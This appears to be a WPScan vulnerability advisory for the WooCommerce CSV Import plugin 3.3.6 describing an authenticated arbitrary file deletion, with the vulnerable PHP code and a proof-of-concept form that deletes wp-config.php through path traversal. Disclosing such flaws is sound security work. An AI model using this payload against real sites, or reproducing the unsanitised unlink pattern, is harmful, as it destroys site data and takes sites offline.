woocommerce-csvimport 3.3.6 – Authenticated Arbitrary File Deletion

Sign up to our free email alerts service for instant vulnerability notifications!

Description
Type user access: any user registered.

$_POST['filename'] is not escaped.
Code
File: wp-content/plugins/woocommerce-csvimport/export/include/classes/woocsvExport.php Line:64
public function delete_export_file() {
   
   if ( isset( $_POST['filename'] ) ) {
      @unlink( $_POST['filename'] );
   }
   wp_die( 0 );
}

Result:

wp-config.php file deleted and restart the all system.
Proof of Concept
1 – Log in with any user.
2 - Execute form:
<form method="post" action="http://src.wordpress-develop.dev/wp-admin/admin-ajax.php?action=delete_export_file">
   <input type="text" name="filename" value="../wp-config.php">
   <input type="submit">
</form>

Affects Plugin

References

URL https://lenonleite.com.br/publish-exploits/plugin-woocommerce-csv-importer-3-3-6-rce-unlink/

Classification

Type UNKNOWN

Miscellaneous

Submitter Lenon Leite
Submitter Website https://lenonleite.com.br/
Submitter Twitter https://twitter.com/lenonleite
Views 48
Verified No
WPVDB ID 9057

Timeline

Publicly Published 2017-12-27 (4 months ago)
Added 2018-04-09 (18 days ago)
Last Updated 2018-04-09 (18 days ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.